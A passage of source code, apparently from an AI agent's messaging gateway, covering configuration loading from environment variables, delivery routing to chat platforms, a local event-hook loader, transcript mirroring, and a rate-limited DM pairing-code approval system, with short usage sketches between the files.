if sr and isinstance(sr, dict):
config.default_reset_policy = SessionResetPolicy.from_dict(sr)
# Bridge discord settings from config.yaml to env vars
# (env vars take precedence — only set if not already defined)
discord_cfg = yaml_cfg.get("discord", {})
if isinstance(discord_cfg, dict):
if "require_mention" in discord_cfg and not os.getenv("DISCORD_REQUIRE_MENTION"):
os.environ["DISCORD_REQUIRE_MENTION"] = str(discord_cfg["require_mention"]).lower()
frc = discord_cfg.get("free_response_channels")
if frc is not None and not os.getenv("DISCORD_FREE_RESPONSE_CHANNELS"):
if isinstance(frc, list):
frc = ",".join(str(v) for v in frc)
os.environ["DISCORD_FREE_RESPONSE_CHANNELS"] = str(frc)
if "auto_thread" in discord_cfg and not os.getenv("DISCORD_AUTO_THREAD"):
os.environ["DISCORD_AUTO_THREAD"] = str(discord_cfg["auto_thread"]).lower()
except Exception:
pass
# Override with environment variables
_apply_env_overrides(config)
# --- Validate loaded values ---
policy = config.default_reset_policy
if not (0 <= policy.at_hour <= 23):
logger.warning(
"Invalid at_hour=%s (must be 0-23). Using default 4.", policy.at_hour
)
policy.at_hour = 4
if policy.idle_minutes is None or policy.idle_minutes <= 0:
logger.warning(
"Invalid idle_minutes=%s (must be positive). Using default 1440.",
policy.idle_minutes,
)
policy.idle_minutes = 1440
# Warn about empty bot tokens — platforms that loaded an empty string
# won't connect and the cause can be confusing without a log line.
_token_env_names = {
Platform.TELEGRAM: "TELEGRAM_BOT_TOKEN",
Platform.DISCORD: "DISCORD_BOT_TOKEN",
Platform.SLACK: "SLACK_BOT_TOKEN",
}
for platform, pconfig in config.platforms.items():
if not pconfig.enabled:
continue
env_name = _token_env_names.get(platform)
if env_name and pconfig.token is not None and not pconfig.token.strip():
logger.warning(
"%s is enabled but %s is empty. "
"The adapter will likely fail to connect.",
platform.value, env_name,
)
return config
def _apply_env_overrides(config: GatewayConfig) -> None:
"""Apply environment variable overrides to config."""
# Telegram
telegram_token = os.getenv("TELEGRAM_BOT_TOKEN")
if telegram_token:
if Platform.TELEGRAM not in config.platforms:
config.platforms[Platform.TELEGRAM] = PlatformConfig()
config.platforms[Platform.TELEGRAM].enabled = True
config.platforms[Platform.TELEGRAM].token = telegram_token
telegram_home = os.getenv("TELEGRAM_HOME_CHANNEL")
if telegram_home and Platform.TELEGRAM in config.platforms:
config.platforms[Platform.TELEGRAM].home_channel = HomeChannel(
platform=Platform.TELEGRAM,
chat_id=telegram_home,
name=os.getenv("TELEGRAM_HOME_CHANNEL_NAME", "Home"),
)
# Discord
discord_token = os.getenv("DISCORD_BOT_TOKEN")
if discord_token:
if Platform.DISCORD not in config.platforms:
config.platforms[Platform.DISCORD] = PlatformConfig()
config.platforms[Platform.DISCORD].enabled = True
config.platforms[Platform.DISCORD].token = discord_token
discord_home = os.getenv("DISCORD_HOME_CHANNEL")
if discord_home and Platform.DISCORD in config.platforms:
config.platforms[Platform.DISCORD].home_channel = HomeChannel(
platform=Platform.DISCORD,
chat_id=discord_home,
name=os.getenv("DISCORD_HOME_CHANNEL_NAME", "Home"),
)
# WhatsApp (typically uses different auth mechanism)
whatsapp_enabled = os.getenv("WHATSAPP_ENABLED", "").lower() in ("true", "1", "yes")
if whatsapp_enabled:
if Platform.WHATSAPP not in config.platforms:
config.platforms[Platform.WHATSAPP] = PlatformConfig()
config.platforms[Platform.WHATSAPP].enabled = True
# Slack
slack_token = os.getenv("SLACK_BOT_TOKEN")
if slack_token:
if Platform.SLACK not in config.platforms:
config.platforms[Platform.SLACK] = PlatformConfig()
config.platforms[Platform.SLACK].enabled = True
config.platforms[Platform.SLACK].token = slack_token
# Home channel
slack_home = os.getenv("SLACK_HOME_CHANNEL")
if slack_home and Platform.SLACK in config.platforms:
config.platforms[Platform.SLACK].home_channel = HomeChannel(
platform=Platform.SLACK,
chat_id=slack_home,
name=os.getenv("SLACK_HOME_CHANNEL_NAME", ""),
)
# Signal
signal_url = os.getenv("SIGNAL_HTTP_URL")
signal_account = os.getenv("SIGNAL_ACCOUNT")
if signal_url and signal_account:
if Platform.SIGNAL not in config.platforms:
config.platforms[Platform.SIGNAL] = PlatformConfig()
config.platforms[Platform.SIGNAL].enabled = True
config.platforms[Platform.SIGNAL].extra.update({
"http_url": signal_url,
"account": signal_account,
"ignore_stories": os.getenv("SIGNAL_IGNORE_STORIES", "true").lower() in ("true", "1", "yes"),
})
signal_home = os.getenv("SIGNAL_HOME_CHANNEL")
if signal_home and Platform.SIGNAL in config.platforms:
config.platforms[Platform.SIGNAL].home_channel = HomeChannel(
platform=Platform.SIGNAL,
chat_id=signal_home,
name=os.getenv("SIGNAL_HOME_CHANNEL_NAME", "Home"),
)
# Home Assistant
hass_token = os.getenv("HASS_TOKEN")
if hass_token:
if Platform.HOMEASSISTANT not in config.platforms:
config.platforms[Platform.HOMEASSISTANT] = PlatformConfig()
config.platforms[Platform.HOMEASSISTANT].enabled = True
config.platforms[Platform.HOMEASSISTANT].token = hass_token
hass_url = os.getenv("HASS_URL")
if hass_url and Platform.HOMEASSISTANT in config.platforms:
config.platforms[Platform.HOMEASSISTANT].extra["url"] = hass_url
# Email
email_addr = os.getenv("EMAIL_ADDRESS")
email_pwd = os.getenv("EMAIL_PASSWORD")
email_imap = os.getenv("EMAIL_IMAP_HOST")
email_smtp = os.getenv("EMAIL_SMTP_HOST")
if all([email_addr, email_pwd, email_imap, email_smtp]):
if Platform.EMAIL not in config.platforms:
config.platforms[Platform.EMAIL] = PlatformConfig()
config.platforms[Platform.EMAIL].enabled = True
config.platforms[Platform.EMAIL].extra.update({
"address": email_addr,
"imap_host": email_imap,
"smtp_host": email_smtp,
})
email_home = os.getenv("EMAIL_HOME_ADDRESS")
if email_home and Platform.EMAIL in config.platforms:
config.platforms[Platform.EMAIL].home_channel = HomeChannel(
platform=Platform.EMAIL,
chat_id=email_home,
name=os.getenv("EMAIL_HOME_ADDRESS_NAME", "Home"),
)
# Session settings
idle_minutes = os.getenv("SESSION_IDLE_MINUTES")
if idle_minutes:
try:
config.default_reset_policy.idle_minutes = int(idle_minutes)
except ValueError:
pass
reset_hour = os.getenv("SESSION_RESET_HOUR")
if reset_hour:
try:
config.default_reset_policy.at_hour = int(reset_hour)
except ValueError:
pass
def save_gateway_config(config: GatewayConfig) -> None:
"""Save gateway configuration to ~/.hermes/gateway.json."""
gateway_config_path = Path.home() / ".hermes" / "gateway.json"
gateway_config_path.parent.mkdir(parents=True, exist_ok=True)
with open(gateway_config_path, "w", encoding="utf-8") as f:
json.dump(config.to_dict(), f, indent=2)

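As a quick usage sketch (illustrative values; assumes the repo is on `PYTHONPATH` so `gateway.config` imports): because environment variables sit at the top of the precedence chain, exporting a bot token is enough to enable a platform even with no `gateway.json` present.

```python
import os

from gateway.config import Platform, load_gateway_config

# Env vars override gateway.json and config.yaml (see the priority list above).
os.environ["TELEGRAM_BOT_TOKEN"] = "123456:dummy-token"  # illustrative token
os.environ["SESSION_IDLE_MINUTES"] = "240"               # 4-hour idle reset

config = load_gateway_config()
assert config.platforms[Platform.TELEGRAM].enabled
assert config.default_reset_policy.idle_minutes == 240
```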
345 gateway/delivery.py Normal file

@@ -0,0 +1,345 @@
"""
Delivery routing for cron job outputs and agent responses.
Routes messages to the appropriate destination based on:
- Explicit targets (e.g., "telegram:123456789")
- Platform home channels (e.g., "telegram" → home channel)
- Origin (back to where the job was created)
- Local (always saved to files)
"""
import logging
from pathlib import Path
from datetime import datetime
from dataclasses import dataclass
from typing import Dict, List, Optional, Any, Union
from .config import Platform, GatewayConfig
from .session import SessionSource
logger = logging.getLogger(__name__)
# Guardrails for oversized output sent to messaging platforms
MAX_PLATFORM_OUTPUT = 4000
TRUNCATED_VISIBLE = 3800
@dataclass
class DeliveryTarget:
"""
A single delivery target.
Represents where a message should be sent:
- "origin" → back to source
- "local" → save to local files
- "telegram" → Telegram home channel
- "telegram:123456" → specific Telegram chat
"""
platform: Platform
chat_id: Optional[str] = None # None means use home channel
thread_id: Optional[str] = None
is_origin: bool = False
is_explicit: bool = False # True if chat_id was explicitly specified
@classmethod
def parse(cls, target: str, origin: Optional[SessionSource] = None) -> "DeliveryTarget":
"""
Parse a delivery target string.
Formats:
- "origin" → back to source
- "local" → local files only
- "telegram" → Telegram home channel
- "telegram:123456" → specific Telegram chat
"""
target = target.strip().lower()
if target == "origin":
if origin:
return cls(
platform=origin.platform,
chat_id=origin.chat_id,
thread_id=origin.thread_id,
is_origin=True,
)
else:
# Fallback to local if no origin
return cls(platform=Platform.LOCAL, is_origin=True)
if target == "local":
return cls(platform=Platform.LOCAL)
# Check for platform:chat_id format
if ":" in target:
platform_str, chat_id = target.split(":", 1)
try:
platform = Platform(platform_str)
return cls(platform=platform, chat_id=chat_id, is_explicit=True)
except ValueError:
# Unknown platform, treat as local
return cls(platform=Platform.LOCAL)
# Just a platform name (use home channel)
try:
platform = Platform(target)
return cls(platform=platform)
except ValueError:
# Unknown platform, treat as local
return cls(platform=Platform.LOCAL)
def to_string(self) -> str:
"""Convert back to string format."""
if self.is_origin:
return "origin"
if self.platform == Platform.LOCAL:
return "local"
if self.chat_id:
return f"{self.platform.value}:{self.chat_id}"
return self.platform.value
class DeliveryRouter:
"""
Routes messages to appropriate destinations.
Handles the logic of resolving delivery targets and dispatching
messages to the right platform adapters.
"""
def __init__(self, config: GatewayConfig, adapters: Optional[Dict[Platform, Any]] = None):
"""
Initialize the delivery router.
Args:
config: Gateway configuration
adapters: Dict mapping platforms to their adapter instances
"""
self.config = config
self.adapters = adapters or {}
self.output_dir = Path.home() / ".hermes" / "cron" / "output"
def resolve_targets(
self,
deliver: Union[str, List[str]],
origin: Optional[SessionSource] = None
) -> List[DeliveryTarget]:
"""
Resolve delivery specification to concrete targets.
Args:
deliver: Delivery spec - "origin", "telegram", ["local", "discord"], etc.
origin: The source where the request originated (for "origin" target)
Returns:
List of resolved delivery targets
"""
if isinstance(deliver, str):
deliver = [deliver]
targets = []
seen_platforms = set()
for target_str in deliver:
target = DeliveryTarget.parse(target_str, origin)
# Resolve home channel if needed
if target.chat_id is None and target.platform != Platform.LOCAL:
home = self.config.get_home_channel(target.platform)
if home:
target.chat_id = home.chat_id
else:
# No home channel configured, skip this platform
continue
# Deduplicate
key = (target.platform, target.chat_id, target.thread_id)
if key not in seen_platforms:
seen_platforms.add(key)
targets.append(target)
# Always include local if configured
if self.config.always_log_local:
local_key = (Platform.LOCAL, None, None)  # match the (platform, chat_id, thread_id) keys above
if local_key not in seen_platforms:
targets.append(DeliveryTarget(platform=Platform.LOCAL))
return targets
async def deliver(
self,
content: str,
targets: List[DeliveryTarget],
job_id: Optional[str] = None,
job_name: Optional[str] = None,
metadata: Optional[Dict[str, Any]] = None
) -> Dict[str, Any]:
"""
Deliver content to all specified targets.
Args:
content: The message/output to deliver
targets: List of delivery targets
job_id: Optional job ID (for cron jobs)
job_name: Optional job name
metadata: Additional metadata to include
Returns:
Dict with delivery results per target
"""
results = {}
for target in targets:
try:
if target.platform == Platform.LOCAL:
result = self._deliver_local(content, job_id, job_name, metadata)
else:
result = await self._deliver_to_platform(target, content, metadata)
results[target.to_string()] = {
"success": True,
"result": result
}
except Exception as e:
results[target.to_string()] = {
"success": False,
"error": str(e)
}
return results
def _deliver_local(
self,
content: str,
job_id: Optional[str],
job_name: Optional[str],
metadata: Optional[Dict[str, Any]]
) -> Dict[str, Any]:
"""Save content to local files."""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if job_id:
output_path = self.output_dir / job_id / f"{timestamp}.md"
else:
output_path = self.output_dir / "misc" / f"{timestamp}.md"
output_path.parent.mkdir(parents=True, exist_ok=True)
# Build the output document
lines = []
if job_name:
lines.append(f"# {job_name}")
else:
lines.append("# Delivery Output")
lines.append("")
lines.append(f"**Timestamp:** {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
if job_id:
lines.append(f"**Job ID:** {job_id}")
if metadata:
for key, value in metadata.items():
lines.append(f"**{key}:** {value}")
lines.append("")
lines.append("---")
lines.append("")
lines.append(content)
output_path.write_text("\n".join(lines), encoding="utf-8")
return {
"path": str(output_path),
"timestamp": timestamp
}
def _save_full_output(self, content: str, job_id: str) -> Path:
"""Save full cron output to disk and return the file path."""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
out_dir = Path.home() / ".hermes" / "cron" / "output"
out_dir.mkdir(parents=True, exist_ok=True)
path = out_dir / f"{job_id}_{timestamp}.txt"
path.write_text(content, encoding="utf-8")
return path
async def _deliver_to_platform(
self,
target: DeliveryTarget,
content: str,
metadata: Optional[Dict[str, Any]]
) -> Dict[str, Any]:
"""Deliver content to a messaging platform."""
adapter = self.adapters.get(target.platform)
if not adapter:
raise ValueError(f"No adapter configured for {target.platform.value}")
if not target.chat_id:
raise ValueError(f"No chat ID for {target.platform.value} delivery")
# Guard: truncate oversized cron output to stay within platform limits
if len(content) > MAX_PLATFORM_OUTPUT:
job_id = (metadata or {}).get("job_id", "unknown")
saved_path = self._save_full_output(content, job_id)
logger.info("Cron output truncated (%d chars) — full output: %s", len(content), saved_path)
content = (
content[:TRUNCATED_VISIBLE]
+ f"\n\n... [truncated, full output saved to {saved_path}]"
)
send_metadata = dict(metadata or {})
if target.thread_id and "thread_id" not in send_metadata:
send_metadata["thread_id"] = target.thread_id
return await adapter.send(target.chat_id, content, metadata=send_metadata or None)
def parse_deliver_spec(
deliver: Optional[Union[str, List[str]]],
origin: Optional[SessionSource] = None,
default: str = "origin"
) -> Union[str, List[str]]:
"""
Normalize a delivery specification.
If None or empty, returns the default.
"""
if not deliver:
return default
return deliver
def build_delivery_context_for_tool(
config: GatewayConfig,
origin: Optional[SessionSource] = None
) -> Dict[str, Any]:
"""
Build context for the schedule_cronjob tool to understand delivery options.
This is passed to the tool so it can validate and explain delivery targets.
"""
connected = config.get_connected_platforms()
options = {
"origin": {
"description": "Back to where this job was created",
"available": origin is not None,
},
"local": {
"description": "Save to local files only",
"available": True,
}
}
for platform in connected:
home = config.get_home_channel(platform)
options[platform.value] = {
"description": f"{platform.value.title()} home channel",
"available": True,
"home_channel": home.to_dict() if home else None,
}
return {
"origin": origin.to_dict() if origin else None,
"options": options,
"always_log_local": config.always_log_local,
}

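A small sketch of the routing flow above (no live adapters are passed, so the explicit Telegram leg fails gracefully and is reported per-target while the local copy is still written):

```python
import asyncio

from gateway.config import load_gateway_config
from gateway.delivery import DeliveryRouter, parse_deliver_spec

async def main() -> None:
    config = load_gateway_config()
    router = DeliveryRouter(config, adapters={})  # no adapters: platform sends error per-target
    spec = parse_deliver_spec(["telegram:123456", "local"])  # explicit chat + local file
    targets = router.resolve_targets(spec)
    results = await router.deliver("nightly report body", targets, job_id="demo")
    for target, outcome in results.items():
        print(target, "ok" if outcome["success"] else outcome["error"])

asyncio.run(main())
```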
150 gateway/hooks.py Normal file

@@ -0,0 +1,150 @@
"""
Event Hook System
A lightweight event-driven system that fires handlers at key lifecycle points.
Hooks are discovered from ~/.hermes/hooks/ directories, each containing:
- HOOK.yaml (metadata: name, description, events list)
- handler.py (Python handler with async def handle(event_type, context))
Events:
- gateway:startup -- Gateway process starts
- session:start -- New session created
- session:reset -- User ran /new or /reset
- agent:start -- Agent begins processing a message
- agent:step -- Each turn in the tool-calling loop
- agent:end -- Agent finishes processing
- command:* -- Any slash command executed (wildcard match)
Errors in hooks are caught and logged but never block the main pipeline.
"""
import asyncio
import importlib.util
import os
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional
import yaml
HOOKS_DIR = Path(os.path.expanduser("~/.hermes/hooks"))
class HookRegistry:
"""
Discovers, loads, and fires event hooks.
Usage:
registry = HookRegistry()
registry.discover_and_load()
await registry.emit("agent:start", {"platform": "telegram", ...})
"""
def __init__(self):
# event_type -> [handler_fn, ...]
self._handlers: Dict[str, List[Callable]] = {}
self._loaded_hooks: List[dict] = [] # metadata for listing
@property
def loaded_hooks(self) -> List[dict]:
"""Return metadata about all loaded hooks."""
return list(self._loaded_hooks)
def discover_and_load(self) -> None:
"""
Scan the hooks directory for hook directories and load their handlers.
Each hook directory must contain:
- HOOK.yaml with at least 'name' and 'events' keys
- handler.py with a top-level 'handle' function (sync or async)
"""
if not HOOKS_DIR.exists():
return
for hook_dir in sorted(HOOKS_DIR.iterdir()):
if not hook_dir.is_dir():
continue
manifest_path = hook_dir / "HOOK.yaml"
handler_path = hook_dir / "handler.py"
if not manifest_path.exists() or not handler_path.exists():
continue
try:
manifest = yaml.safe_load(manifest_path.read_text(encoding="utf-8"))
if not manifest or not isinstance(manifest, dict):
print(f"[hooks] Skipping {hook_dir.name}: invalid HOOK.yaml", flush=True)
continue
hook_name = manifest.get("name", hook_dir.name)
events = manifest.get("events", [])
if not events:
print(f"[hooks] Skipping {hook_name}: no events declared", flush=True)
continue
# Dynamically load the handler module
spec = importlib.util.spec_from_file_location(
f"hermes_hook_{hook_name}", handler_path
)
if spec is None or spec.loader is None:
print(f"[hooks] Skipping {hook_name}: could not load handler.py", flush=True)
continue
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
handle_fn = getattr(module, "handle", None)
if handle_fn is None:
print(f"[hooks] Skipping {hook_name}: no 'handle' function found", flush=True)
continue
# Register the handler for each declared event
for event in events:
self._handlers.setdefault(event, []).append(handle_fn)
self._loaded_hooks.append({
"name": hook_name,
"description": manifest.get("description", ""),
"events": events,
"path": str(hook_dir),
})
print(f"[hooks] Loaded hook '{hook_name}' for events: {events}", flush=True)
except Exception as e:
print(f"[hooks] Error loading hook {hook_dir.name}: {e}", flush=True)
async def emit(self, event_type: str, context: Optional[Dict[str, Any]] = None) -> None:
"""
Fire all handlers registered for an event.
Supports wildcard matching: handlers registered for "command:*" will
fire for any "command:..." event. Handlers registered for a base type
like "agent" won't fire for "agent:start" -- only exact matches and
explicit wildcards.
Args:
event_type: The event identifier (e.g. "agent:start").
context: Optional dict with event-specific data.
"""
if context is None:
context = {}
# Collect handlers: exact match + wildcard match
handlers = list(self._handlers.get(event_type, []))
# Check for wildcard patterns (e.g., "command:*" matches "command:reset")
if ":" in event_type:
base = event_type.split(":")[0]
wildcard_key = f"{base}:*"
handlers.extend(self._handlers.get(wildcard_key, []))
for fn in handlers:
try:
result = fn(event_type, context)
# Support both sync and async handlers
if asyncio.iscoroutine(result):
await result
except Exception as e:
print(f"[hooks] Error in handler for '{event_type}': {e}", flush=True)

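A minimal working hook under the layout described in the module docstring (directory name and handler body are illustrative):

```python
# ~/.hermes/hooks/log-agent-activity/HOOK.yaml (illustrative):
#
#   name: log-agent-activity
#   description: Print a line for agent starts and every slash command
#   events:
#     - "agent:start"
#     - "command:*"
#
# ~/.hermes/hooks/log-agent-activity/handler.py:
async def handle(event_type: str, context: dict) -> None:
    # Sync handlers also work -- emit() only awaits coroutines.
    print(f"[log-agent-activity] {event_type} on {context.get('platform', '?')}", flush=True)
```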
131 gateway/mirror.py Normal file

@@ -0,0 +1,131 @@
"""
Session mirroring for cross-platform message delivery.
When a message is sent to a platform (via send_message or cron delivery),
this module appends a "delivery-mirror" record to the target session's
transcript so the receiving-side agent has context about what was sent.
Standalone -- works from CLI, cron, and gateway contexts without needing
the full SessionStore machinery.
"""
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Optional
logger = logging.getLogger(__name__)
_SESSIONS_DIR = Path.home() / ".hermes" / "sessions"
_SESSIONS_INDEX = _SESSIONS_DIR / "sessions.json"
def mirror_to_session(
platform: str,
chat_id: str,
message_text: str,
source_label: str = "cli",
thread_id: Optional[str] = None,
) -> bool:
"""
Append a delivery-mirror message to the target session's transcript.
Finds the gateway session that matches the given platform + chat_id,
then writes a mirror entry to both the JSONL transcript and SQLite DB.
Returns True if mirrored successfully, False if no matching session or error.
All errors are caught -- this is never fatal.
"""
try:
session_id = _find_session_id(platform, str(chat_id), thread_id=thread_id)
if not session_id:
logger.debug("Mirror: no session found for %s:%s:%s", platform, chat_id, thread_id)
return False
mirror_msg = {
"role": "assistant",
"content": message_text,
"timestamp": datetime.now().isoformat(),
"mirror": True,
"mirror_source": source_label,
}
_append_to_jsonl(session_id, mirror_msg)
_append_to_sqlite(session_id, mirror_msg)
logger.debug("Mirror: wrote to session %s (from %s)", session_id, source_label)
return True
except Exception as e:
logger.debug("Mirror failed for %s:%s:%s: %s", platform, chat_id, thread_id, e)
return False
def _find_session_id(platform: str, chat_id: str, thread_id: Optional[str] = None) -> Optional[str]:
"""
Find the active session_id for a platform + chat_id pair.
Scans sessions.json entries and matches where origin.chat_id == chat_id
on the right platform. DM session keys don't embed the chat_id
(e.g. "agent:main:telegram:dm"), so we check the origin dict.
"""
if not _SESSIONS_INDEX.exists():
return None
try:
with open(_SESSIONS_INDEX, encoding="utf-8") as f:
data = json.load(f)
except Exception:
return None
platform_lower = platform.lower()
best_match = None
best_updated = ""
for _key, entry in data.items():
origin = entry.get("origin") or {}
entry_platform = (origin.get("platform") or entry.get("platform", "")).lower()
if entry_platform != platform_lower:
continue
origin_chat_id = str(origin.get("chat_id", ""))
if origin_chat_id == str(chat_id):
origin_thread_id = origin.get("thread_id")
if thread_id is not None and str(origin_thread_id or "") != str(thread_id):
continue
updated = entry.get("updated_at", "")
if updated > best_updated:
best_updated = updated
best_match = entry.get("session_id")
return best_match
def _append_to_jsonl(session_id: str, message: dict) -> None:
"""Append a message to the JSONL transcript file."""
transcript_path = _SESSIONS_DIR / f"{session_id}.jsonl"
try:
with open(transcript_path, "a", encoding="utf-8") as f:
f.write(json.dumps(message, ensure_ascii=False) + "\n")
except Exception as e:
logger.debug("Mirror JSONL write failed: %s", e)
def _append_to_sqlite(session_id: str, message: dict) -> None:
"""Append a message to the SQLite session database."""
db = None
try:
from hermes_state import SessionDB
db = SessionDB()
db.append_message(
session_id=session_id,
role=message.get("role", "assistant"),
content=message.get("content"),
)
except Exception as e:
logger.debug("Mirror SQLite write failed: %s", e)
finally:
if db is not None:
db.close()

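Usage sketch (chat ID illustrative): a cron job that just sent a Telegram message can mirror it so the next agent turn in that chat has context.

```python
from gateway.mirror import mirror_to_session

ok = mirror_to_session(
    platform="telegram",
    chat_id="123456789",          # illustrative chat
    message_text="Sent the weekly summary.",
    source_label="cron",
)
if not ok:
    # Never fatal: False means no matching session, or a swallowed write error.
    print("nothing mirrored")
```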
282 gateway/pairing.py Normal file

@@ -0,0 +1,282 @@
"""
DM Pairing System
Code-based approval flow for authorizing new users on messaging platforms.
Instead of static allowlists with user IDs, unknown users receive a one-time
pairing code that the bot owner approves via the CLI.
Security features (based on OWASP + NIST SP 800-63-4 guidance):
- 8-char codes from 32-char unambiguous alphabet (no 0/O/1/I)
- Cryptographic randomness via secrets.choice()
- 1-hour code expiry
- Max 3 pending codes per platform
- Rate limiting: 1 request per user per 10 minutes
- Lockout after 5 failed approval attempts (1 hour)
- File permissions: chmod 0600 on all data files
- Codes are never logged to stdout
Storage: ~/.hermes/pairing/
"""
import json
import os
import secrets
import time
from pathlib import Path
from typing import Optional
# Unambiguous alphabet -- excludes 0/O, 1/I to prevent confusion
ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
CODE_LENGTH = 8
# Timing constants
CODE_TTL_SECONDS = 3600 # Codes expire after 1 hour
RATE_LIMIT_SECONDS = 600 # 1 request per user per 10 minutes
LOCKOUT_SECONDS = 3600 # Lockout duration after too many failures
# Limits
MAX_PENDING_PER_PLATFORM = 3 # Max pending codes per platform
MAX_FAILED_ATTEMPTS = 5 # Failed approvals before lockout
PAIRING_DIR = Path(os.path.expanduser("~/.hermes/pairing"))
def _secure_write(path: Path, data: str) -> None:
"""Write data to file with restrictive permissions (owner read/write only)."""
path.parent.mkdir(parents=True, exist_ok=True)
path.write_text(data, encoding="utf-8")
try:
os.chmod(path, 0o600)
except OSError:
pass # Windows doesn't support chmod the same way
class PairingStore:
"""
Manages pairing codes and approved user lists.
Data files per platform:
- {platform}-pending.json : pending pairing requests
- {platform}-approved.json : approved (paired) users
- _rate_limits.json : rate limit tracking
"""
def __init__(self):
PAIRING_DIR.mkdir(parents=True, exist_ok=True)
def _pending_path(self, platform: str) -> Path:
return PAIRING_DIR / f"{platform}-pending.json"
def _approved_path(self, platform: str) -> Path:
return PAIRING_DIR / f"{platform}-approved.json"
def _rate_limit_path(self) -> Path:
return PAIRING_DIR / "_rate_limits.json"
def _load_json(self, path: Path) -> dict:
if path.exists():
try:
return json.loads(path.read_text(encoding="utf-8"))
except (json.JSONDecodeError, OSError):
return {}
return {}
def _save_json(self, path: Path, data: dict) -> None:
_secure_write(path, json.dumps(data, indent=2, ensure_ascii=False))
# ----- Approved users -----
def is_approved(self, platform: str, user_id: str) -> bool:
"""Check if a user is approved (paired) on a platform."""
approved = self._load_json(self._approved_path(platform))
return user_id in approved
def list_approved(self, platform: Optional[str] = None) -> list:
"""List approved users, optionally filtered by platform."""
results = []
platforms = [platform] if platform else self._all_platforms("approved")
for p in platforms:
approved = self._load_json(self._approved_path(p))
for uid, info in approved.items():
results.append({"platform": p, "user_id": uid, **info})
return results
def _approve_user(self, platform: str, user_id: str, user_name: str = "") -> None:
"""Add a user to the approved list."""
approved = self._load_json(self._approved_path(platform))
approved[user_id] = {
"user_name": user_name,
"approved_at": time.time(),
}
self._save_json(self._approved_path(platform), approved)
def revoke(self, platform: str, user_id: str) -> bool:
"""Remove a user from the approved list. Returns True if found."""
path = self._approved_path(platform)
approved = self._load_json(path)
if user_id in approved:
del approved[user_id]
self._save_json(path, approved)
return True
return False
# ----- Pending codes -----
def generate_code(
self, platform: str, user_id: str, user_name: str = ""
) -> Optional[str]:
"""
Generate a pairing code for a new user.
Returns the code string, or None if:
- User is rate-limited (too recent request)
- Max pending codes reached for this platform
- User/platform is in lockout due to failed attempts
"""
self._cleanup_expired(platform)
# Check lockout
if self._is_locked_out(platform):
return None
# Check rate limit for this specific user
if self._is_rate_limited(platform, user_id):
return None
# Check max pending
pending = self._load_json(self._pending_path(platform))
if len(pending) >= MAX_PENDING_PER_PLATFORM:
return None
# Generate cryptographically random code
code = "".join(secrets.choice(ALPHABET) for _ in range(CODE_LENGTH))
# Store pending request
pending[code] = {
"user_id": user_id,
"user_name": user_name,
"created_at": time.time(),
}
self._save_json(self._pending_path(platform), pending)
# Record rate limit
self._record_rate_limit(platform, user_id)
return code
def approve_code(self, platform: str, code: str) -> Optional[dict]:
"""
Approve a pairing code. Adds the user to the approved list.
Returns {user_id, user_name} on success, None if code is invalid/expired.
"""
self._cleanup_expired(platform)
code = code.upper().strip()
pending = self._load_json(self._pending_path(platform))
if code not in pending:
self._record_failed_attempt(platform)
return None
entry = pending.pop(code)
self._save_json(self._pending_path(platform), pending)
# Add to approved list
self._approve_user(platform, entry["user_id"], entry.get("user_name", ""))
return {
"user_id": entry["user_id"],
"user_name": entry.get("user_name", ""),
}
def list_pending(self, platform: Optional[str] = None) -> list:
"""List pending pairing requests, optionally filtered by platform."""
results = []
platforms = [platform] if platform else self._all_platforms("pending")
for p in platforms:
self._cleanup_expired(p)
pending = self._load_json(self._pending_path(p))
for code, info in pending.items():
age_min = int((time.time() - info["created_at"]) / 60)
results.append({
"platform": p,
"code": code,
"user_id": info["user_id"],
"user_name": info.get("user_name", ""),
"age_minutes": age_min,
})
return results
def clear_pending(self, platform: Optional[str] = None) -> int:
"""Clear all pending requests. Returns count removed."""
count = 0
platforms = [platform] if platform else self._all_platforms("pending")
for p in platforms:
pending = self._load_json(self._pending_path(p))
count += len(pending)
self._save_json(self._pending_path(p), {})
return count
# ----- Rate limiting and lockout -----
def _is_rate_limited(self, platform: str, user_id: str) -> bool:
"""Check if a user has requested a code too recently."""
limits = self._load_json(self._rate_limit_path())
key = f"{platform}:{user_id}"
last_request = limits.get(key, 0)
return (time.time() - last_request) < RATE_LIMIT_SECONDS
def _record_rate_limit(self, platform: str, user_id: str) -> None:
"""Record the time of a pairing request for rate limiting."""
limits = self._load_json(self._rate_limit_path())
key = f"{platform}:{user_id}"
limits[key] = time.time()
self._save_json(self._rate_limit_path(), limits)
def _is_locked_out(self, platform: str) -> bool:
"""Check if a platform is in lockout due to failed approval attempts."""
limits = self._load_json(self._rate_limit_path())
lockout_key = f"_lockout:{platform}"
lockout_until = limits.get(lockout_key, 0)
return time.time() < lockout_until
def _record_failed_attempt(self, platform: str) -> None:
"""Record a failed approval attempt. Triggers lockout after MAX_FAILED_ATTEMPTS."""
limits = self._load_json(self._rate_limit_path())
fail_key = f"_failures:{platform}"
fails = limits.get(fail_key, 0) + 1
limits[fail_key] = fails
if fails >= MAX_FAILED_ATTEMPTS:
lockout_key = f"_lockout:{platform}"
limits[lockout_key] = time.time() + LOCKOUT_SECONDS
limits[fail_key] = 0 # Reset counter
print(f"[pairing] Platform {platform} locked out for {LOCKOUT_SECONDS}s "
f"after {MAX_FAILED_ATTEMPTS} failed attempts", flush=True)
self._save_json(self._rate_limit_path(), limits)
# ----- Cleanup -----
def _cleanup_expired(self, platform: str) -> None:
"""Remove expired pending codes."""
path = self._pending_path(platform)
pending = self._load_json(path)
now = time.time()
expired = [
code for code, info in pending.items()
if (now - info["created_at"]) > CODE_TTL_SECONDS
]
if expired:
for code in expired:
del pending[code]
self._save_json(path, pending)
def _all_platforms(self, suffix: str) -> list:
"""List all platforms that have data files of a given suffix."""
platforms = []
for f in PAIRING_DIR.iterdir():
if f.name.endswith(f"-{suffix}.json"):
platform = f.name.replace(f"-{suffix}.json", "")
if not platform.startswith("_"):
platforms.append(platform)
return platforms

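The happy-path lifecycle as a sketch (fresh state and illustrative IDs assumed; a second `generate_code()` call for the same user inside ten minutes would be rate-limited to `None`):

```python
from gateway.pairing import PairingStore

store = PairingStore()
code = store.generate_code("telegram", user_id="424242", user_name="alice")
if code is None:
    print("rate-limited, locked out, or too many pending codes")
else:
    # Owner reads the code out of band (e.g. from the bot's DM) and approves:
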